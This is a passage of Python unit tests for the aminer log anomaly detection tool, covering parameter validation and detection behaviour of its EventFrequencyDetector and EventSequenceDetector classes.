self.aminer_config, [self.stream_printer_event_handler], persistence_id=True) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123.22) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], persistence_id="Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=b"True") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode="True") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=123.22) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=None) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=b"True") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline="True") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=123.22) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], output_logline=True) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=[""]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list="") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=True) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=123.3) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], ignore_list=[]) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], ignore_list=None) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=[""]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list="") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=True) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=123.3) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], constraint_list=[]) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], constraint_list=None) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) def test7seasonal_frequency_detection(self): """ Test for periodically changing frequencies """ # Initialize detector for analyzing values in one path in time windows of 10 seconds t = 0 expected_string = '%s Frequency anomaly detected\n%s: "None" (%d lines)\n /value: %s\n%s\n\n' dtf = "%Y-%m-%d %H:%M:%S" efd = EventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[self.stream_printer_event_handler], target_path_list=['/value'], window_size=10, num_windows=100, confidence_factor=0.51, empty_window_warnings=True, persistence_id='Default', learn_mode=True, output_logline=True, season=20) # Windows have 1 and 2 atoms alternatingly; the season is thus 2 and expected atom frequencies can be predicted exactly. # The anomaly is that in window 6, only 1 atom occurs although 2 should occur following the sequence. # The anomaly is reported by the log atom in window 7 that concludes window 6. # The following log atoms are created: # window 1: # value a: 1 times # window 2: # value a: 2 time # window 3: # value a: 1 time # window 4: # value a: 2 times # window 5: # value a: 1 time # window 6: # value a: 1 time # window 7: # value a: 1 time m_1 = MatchElement('/value', b'a', b'a', None) parser_match_1 = ParserMatch(m_1) log_atom_1 = LogAtom(b'a', parser_match_1, 1, None) m_2 = MatchElement('/value', b'a', b'a', None) parser_match_2 = ParserMatch(m_2) log_atom_2 = LogAtom(b'a', parser_match_2, 15, None) m_3 = MatchElement('/value', b'a', b'a', None) parser_match_3 = ParserMatch(m_3) log_atom_3 = LogAtom(b'a', parser_match_3, 16, None) m_4 = MatchElement('/value', b'a', b'a', None) parser_match_4 = ParserMatch(m_4) log_atom_4 = LogAtom(b'a', parser_match_4, 25, None) m_6 = MatchElement('/value', b'a', b'a', None) parser_match_6 = ParserMatch(m_6) log_atom_6 = LogAtom(b'a', parser_match_6, 35, None) m_7 = MatchElement('/value', b'a', b'a', None) parser_match_7 = ParserMatch(m_7) log_atom_7 = LogAtom(b'a', parser_match_7, 36, None) m_8 = MatchElement('/value', b'a', b'a', None) parser_match_8 = ParserMatch(m_8) log_atom_8 = LogAtom(b'a', parser_match_8, 45, None) m_9 = MatchElement('/value', b'a', b'a', None) parser_match_9 = ParserMatch(m_9) log_atom_9 = LogAtom(b'a', parser_match_9, 55, None) m_10 = MatchElement('/value', b'a', b'a', None) parser_match_10 = ParserMatch(m_10) log_atom_10 = LogAtom(b'a', parser_match_10, 65, None) efd.receive_atom(log_atom_1) self.assertEqual(self.output_stream.getvalue(), "") efd.receive_atom(log_atom_2) self.assertEqual(self.output_stream.getvalue(), "") efd.receive_atom(log_atom_3) self.assertEqual(self.output_stream.getvalue(), "") efd.receive_atom(log_atom_4) # Delete anomaly that occurs since second window has 2 but first only 1 atoms. self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t+25).strftime(dtf), efd.__class__.__name__, 1, "a", "a")) self.reset_output_stream() efd.receive_atom(log_atom_6) self.assertEqual(self.output_stream.getvalue(), "") efd.receive_atom(log_atom_7) self.assertEqual(self.output_stream.getvalue(), "") efd.receive_atom(log_atom_8) self.assertEqual(self.output_stream.getvalue(), "") efd.receive_atom(log_atom_9) self.assertEqual(self.output_stream.getvalue(), "") efd.receive_atom(log_atom_10) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t+65).strftime(dtf), efd.__class__.__name__, 1, "a", "a")) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/EventSequenceDetectorTest.py000066400000000000000000001024211500476301700312610ustar00rootroot00000000000000import unittest import time from datetime import datetime from aminer.analysis.EventSequenceDetector import EventSequenceDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class EventSequenceDetectorTest(TestBase): """Unittests for the EventSequenceDetector.""" def test1receive_atom(self): """ This test case checks the normal detection of new sequences. The ESD is used to detect value sequences of length 2 and uses one id path to cope with interleaving sequences, i.e., the sequences only make sense when logs that contain the same id are considered. Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ # Initialize detector for sequence length 2 t = time.time() expected_string = '%s New sequence detected\n%s: "None" (%d lines)\n %s\n\n' dtf = "%Y-%m-%d %H:%M:%S" # Prepare log atoms that represent two users (id) that produce interleaved sequence a, b, c # This means, user with id 1 creates sequence a, b, c, and user with id 2 creates sequence # a, b, however, these sequences are interleaved. The ESD resolves this issue using the id # as an id path (/model/id). The path of the values is /model/value. # The following events are generated: # id: 1 value: a # id: 1 value: b # id: 2 value: a # id: 1 value: c # id: 2 value: b m1 = MatchElement("/model/id", b"1", b"1", None) m2 = MatchElement("/model/value", b"a", b"a", None) log_atom1 = LogAtom(b"1a", ParserMatch(MatchElement("/model", b"1a", b"1a", [m1, m2])), t+1, None) m4 = MatchElement("/model/value", b"b", b"b", None) log_atom2 = LogAtom(b"1b", ParserMatch(MatchElement("/model", b"1b", b"1b", [m4])), t+2, None) m5 = MatchElement("/model/id", b"2", b"2", None) m6 = MatchElement("/model/value", b"a", b"a", None) log_atom3 = LogAtom(b"2a", ParserMatch(MatchElement("/model", b"2a", b"2a", [m5, m6])), t+3, None) m7 = MatchElement("/model/id", b"1", b"1", None) m8 = MatchElement("/model/value", b"c", b"c", None) log_atom4 = LogAtom(b"1c", ParserMatch(MatchElement("/model", b"1c", b"1c", [m7, m8])), t+4, None) m9 = MatchElement("/model/id", b"2", b"2", None) m10 = MatchElement("/model/value", b"b", b"b", None) log_atom5 = LogAtom(b"2b", ParserMatch(MatchElement("/model", b"2b", b"2b", [m9, m10])), t+5, None) esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], seq_len=2, learn_mode=True, output_logline=False) esd.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") sequences_set = set() self.assertEqual(esd.sequences, sequences_set) esd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(esd.sequences, sequences_set) esd.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(esd.sequences, sequences_set) esd.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 4).strftime(dtf), esd.__class__.__name__, 1, "1c")) self.reset_output_stream() sequences_set.add((("/model", "/model/id", "/model/value"), ("/model", "/model/id", "/model/value"))) self.assertEqual(esd.sequences, sequences_set) esd.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(esd.sequences, sequences_set) # target_path_list esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], target_path_list=["/model/value"], seq_len=2, learn_mode=True, output_logline=False) # Forward log atoms to detector # Since sequence length is 2, first atom should not have any effect # Input: id: 1 value: a # Expected output: None esd.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") sequences_set = set() self.assertEqual(esd.sequences, sequences_set) # Second log atom should create first sequence # Input: id: 1 value: b # Expected output: New sequence (a, b) detected, added to known sequences esd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(esd.sequences, sequences_set) # Next log atom is of different user, should not have any effect # Input: id: 2 value: a # Expected output: None esd.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(esd.sequences, sequences_set) # Next log atom is of user with id 1, but new value c, thus new sequence should be generated # Input: id: 1 value: c # Expected output: New sequence (b, c) detected, added to known sequences esd.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 4).strftime(dtf), esd.__class__.__name__, 1, "1c")) self.reset_output_stream() sequences_set.add((("a",), ("c",))) self.assertEqual(esd.sequences, sequences_set) # Next log atom is of user with id 2, but sequence a, b is already known from user with id 1, thus no effect # Input: id: 2 value: b # Expected output: None esd.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 5).strftime(dtf), esd.__class__.__name__, 1, "2b")) self.reset_output_stream() sequences_set.add((("a",), ("b",))) self.assertEqual(esd.sequences, sequences_set) # allow_missing_id=True esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], target_path_list=["/model/value"], seq_len=2, learn_mode=True, output_logline=False, allow_missing_id=True) esd.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") sequences_set = set() self.assertEqual(esd.sequences, sequences_set) esd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(esd.sequences, sequences_set) esd.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(esd.sequences, sequences_set) esd.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 4).strftime(dtf), esd.__class__.__name__, 1, "1c")) self.reset_output_stream() sequences_set.add((("a",), ("c",))) self.assertEqual(esd.sequences, sequences_set) esd.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 5).strftime(dtf), esd.__class__.__name__, 1, "2b")) self.reset_output_stream() sequences_set.add((("a",), ("b",))) self.assertEqual(esd.sequences, sequences_set) # stop_learning_time esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], target_path_list=["/model/value"], seq_len=2, learn_mode=True, allow_missing_id=True, stop_learning_time=100) self.assertTrue(esd.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(esd.receive_atom(log_atom1)) self.assertTrue(esd.learn_mode) log_atom1.atom_time = t + 102 self.assertTrue(esd.receive_atom(log_atom1)) self.assertFalse(esd.learn_mode) # stop_learning_no_anomaly_time esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], target_path_list=["/model/value"], seq_len=2, learn_mode=True, allow_missing_id=True, stop_learning_no_anomaly_time=100) log_atom1.atom_time = t self.assertTrue(esd.receive_atom(log_atom1)) log_atom1.atom_time = t + 100 self.assertTrue(esd.receive_atom(log_atom1)) self.assertTrue(esd.learn_mode) log_atom2.atom_time = t + 100 self.assertTrue(esd.receive_atom(log_atom2)) self.assertTrue(esd.learn_mode) log_atom1.atom_time = t + 200 self.assertTrue(esd.receive_atom(log_atom3)) self.assertTrue(esd.learn_mode) log_atom1.atom_time = t + 201 self.assertTrue(esd.receive_atom(log_atom1)) self.assertFalse(esd.learn_mode) def test2do_timer(self): """Test if the do_timer method is implemented properly.""" esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler]) t = time.time() esd.next_persist_time = t + 400 self.assertEqual(esd.do_timer(t + 200), 200) self.assertEqual(esd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(esd.do_timer(t + 999), 1) self.assertEqual(esd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3allowlist_event(self): """Test if the allowlist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler]) analysis = "Analysis.%s" self.assertRaises(Exception, esd.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The EventSequenceDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, esd.allowlist_event, analysis % esd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(esd.allowlist_event(analysis % esd.__class__.__name__, "/s1", None), "Allowlisted path %s in %s." % ("/s1", analysis % esd.__class__.__name__)) self.assertEqual(esd.constraint_list, ["/s1"]) esd.learn_mode = False self.assertEqual(esd.allowlist_event(analysis % esd.__class__.__name__, "/d1", None), "Allowlisted path %s in %s." % ("/d1", analysis % esd.__class__.__name__)) self.assertEqual(esd.constraint_list, ["/s1", "/d1"]) def test4blocklist_event(self): """Test if the blocklist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler]) analysis = "Analysis.%s" self.assertRaises(Exception, esd.blocklist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The EventSequenceDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, esd.blocklist_event, analysis % esd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(esd.blocklist_event(analysis % esd.__class__.__name__, "/s1", None), "Blocklisted path %s in %s." % ("/s1", analysis % esd.__class__.__name__)) self.assertEqual(esd.ignore_list, ["/s1"]) esd.learn_mode = False self.assertEqual(esd.blocklist_event(analysis % esd.__class__.__name__, "/d1", None), "Blocklisted path %s in %s." % ("/d1", analysis % esd.__class__.__name__)) self.assertEqual(esd.ignore_list, ["/s1", "/d1"]) def test5persistence(self): """Test the do_persist and load_persistence_data methods.""" t = time.time() esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], target_path_list=["/model/value"], seq_len=2, learn_mode=True) m1 = MatchElement("/model/id", b"1", b"1", None) m2 = MatchElement("/model/value", b"a", b"a", None) log_atom1 = LogAtom(b"1a", ParserMatch(MatchElement("/model", b"1a", b"1a", [m1, m2])), t + 1, None) m4 = MatchElement("/model/value", b"b", b"b", None) log_atom2 = LogAtom(b"1b", ParserMatch(MatchElement("/model", b"1b", b"1b", [m4])), t + 2, None) m5 = MatchElement("/model/id", b"2", b"2", None) m6 = MatchElement("/model/value", b"a", b"a", None) log_atom3 = LogAtom(b"2a", ParserMatch(MatchElement("/model", b"2a", b"2a", [m5, m6])), t + 3, None) m7 = MatchElement("/model/id", b"1", b"1", None) m8 = MatchElement("/model/value", b"c", b"c", None) log_atom4 = LogAtom(b"1c", ParserMatch(MatchElement("/model", b"1c", b"1c", [m7, m8])), t + 4, None) m9 = MatchElement("/model/id", b"2", b"2", None) m10 = MatchElement("/model/value", b"b", b"b", None) log_atom5 = LogAtom(b"2b", ParserMatch(MatchElement("/model", b"2b", b"2b", [m9, m10])), t + 5, None) esd.receive_atom(log_atom1) esd.receive_atom(log_atom2) esd.receive_atom(log_atom3) esd.receive_atom(log_atom4) esd.receive_atom(log_atom5) esd.do_persist() with open(esd.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[[["string:a"], ["string:b"]], [["string:a"], ["string:c"]]]') self.assertEqual(esd.sequences, {(("a",), ("b",)), (("a",), ("c",))}) esd.sequences = set() esd.load_persistence_data() self.assertEqual(esd.sequences, {(("a",), ("b",)), (("a",), ("c",))}) other = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], target_path_list=["/model/value"], seq_len=2, learn_mode=True) self.assertEqual(other.sequences, esd.sequences) def test6validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, ["default"]) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, None) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, "") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, b"Default") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, True) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, 123) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, 123.3) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, {"id": "Default"}) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, ()) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, set()) self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=[""]) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list="") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=b"Default") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=True) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=123) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=123.3) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list={"id": "Default"}) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=()) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=set()) EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=[]) EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=None) self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=[""]) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list="") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=b"Default") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=True) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=123) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=123.3) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list={"id": "Default"}) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=()) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=set()) EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=[]) EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=None) self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], seq_len=-1) self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], seq_len=0) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], seq_len=100.22) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], seq_len=b"Default") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], seq_len="123") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], seq_len={"id": "Default"}) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], seq_len=["Default"]) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], seq_len=[]) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], seq_len=()) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], seq_len=set()) EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], seq_len=100) self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], timeout=-1) self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], timeout=0) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], timeout=b"Default") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], timeout="123") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], timeout={"id": "Default"}) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], timeout=["Default"]) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], timeout=[]) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], timeout=()) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], timeout=set()) 